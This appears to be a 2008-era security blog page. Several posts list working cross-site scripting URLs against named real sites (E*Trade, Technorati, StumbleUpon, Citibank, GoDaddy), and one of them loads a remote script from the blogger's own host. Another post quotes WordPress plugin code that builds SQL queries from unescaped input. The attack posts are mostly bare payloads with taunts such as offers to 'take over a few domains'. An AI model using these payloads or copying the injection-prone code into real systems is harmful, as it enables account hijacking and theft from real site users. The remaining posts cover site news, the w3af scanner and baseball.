-
Most of these require the user to be logged in, and for those who don’t know, the ‘expression’ technique only works on IE. You will need to use a different method if you want to test it on other browsers. See RSnake's cheat sheet for examples.
https://www.etrade.wallst.com/v1/stocks/snapshot/symbol_lookup.asp?textIn=%22%3E%3Cscript%20src=%22http://www.hiredhacker.com/xss.js%22%3E%3C/script%3E
https://us.etrade.com/e/t/accounts/changemyivrpin?FROM_PAGE=changemypasswords%22+style=%22width:expression(alert(/owned/))
https://express.etrade.com/e/t/applogic/OLAMasterpage2?SC=NPNK4KV%22+style=%22width:expression(alert(/owned/))
https://us.etrade.com/e/t/user/login?TYPE=&REALMOID=&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=&TARGET=%22+style=%22width:expression(alert(/owned/))
https://global.etrade.com/e/t/intl/page?nav=3&subnav=4&screen=1%27;alert(/owned/);//&language=en&country=gl (nav and subnav are also vulnerable parameters)
-
iriStatAppend()
// URL (requested)
$urlRequested = iri_StatPress_URL();
...
$referrer = (isset($_SERVER['HTTP_REFERER']) ? htmlentities($_SERVER['HTTP_REFERER']) : '');
...
$insert = "INSERT INTO " . $table_name . " (date, time, ip, urlrequested, agent, referrer, search,nation,os,browser,searchengine,spider,feed,user,timestamp) "
    . "VALUES ('$vdate','$vtime','$ipAddress','$urlRequested','" . addslashes(strip_tags($userAgent)) . "','$referrer','" . addslashes(strip_tags($search_phrase)) . "','" . iriDomain($ipAddress) . "','$os','$browser','$searchengine','$spider','$feed','$userdata->user_login','$timestamp')";
$results = $wpdb->query($insert);

iri_StatPress_Vars()
if (strpos(strtolower($body), "%thistotalvisits%") !== false) {
    $qry = $wpdb->get_results("SELECT count(DISTINCT(ip)) [...]
-
If anyone is interested, Technorati is full of bugs like this.
http://technorati.com/blogs/tag/%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.technorati.com/404please%27);alert(1);//
http://www.technorati.com/search/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
[POST] http://www.technorati.com/account/bio/?bio_blurb=&company=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&zipcode=&country=US&func=updateuser
-
Free stumbles anyone?
http://www.stumbleupon.com/recover.php?email=no%40no.com%22%3E%3Cscript%3Ealert(1);%3C/script%3E
http://www.stumbleupon.com/find_friend.php?q=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
-
http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=%2522%2522%253e%253cimg src=%2522%2522 onerror=%2522alert(1)%2522
-
Anyone want to take over a few domains?
https://dcc.godaddy.com/DccError.aspx?sa=%22+onerror%3d%27alert(1)%27+%22
https://dcc.godaddy.com/default.aspx?activeview=transfer&filtertype=3&sa=%22+onerror%3d%27alert(1)%27+%22
https://mya.godaddy.com/myaError.aspx?sa=%27%20onerror=%27alert(1)
It’s scary how full of holes godaddy.com is; this is just a sample of what I saw while I was transferring my domains to webfaction.
-
I redesigned, well, picked a new theme, and moved the site to a new hosting company today. I have been severely neglecting hiredhacker.com, but life has been filling my time up with ‘real’ things. I will try and post things from time to time, I just really hate writing. I don’t mind giving technical information or [...]
-
w3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af is a great (and getting better) framework that I just decided to start contributing to. I want to get as much attention to these [...]
-
A little off topic, but if you are a fan of the Sox, or just like baseball, you gotta see this. Here is Manny’s sprinting-wall-climbing-high-fiving-double-play-catch from a few nights ago: http://www.mlb.com/media/video_sl.jsp?video=200805142699480
-
The past few months haven’t exactly been slow for me, hence the lack of new content here. A lot of interesting stuff has happened over the past 2 months; I will try to point out the things I found most interesting. In no particular order (well, except for Mark Dowd’s inhuman paper, that [...]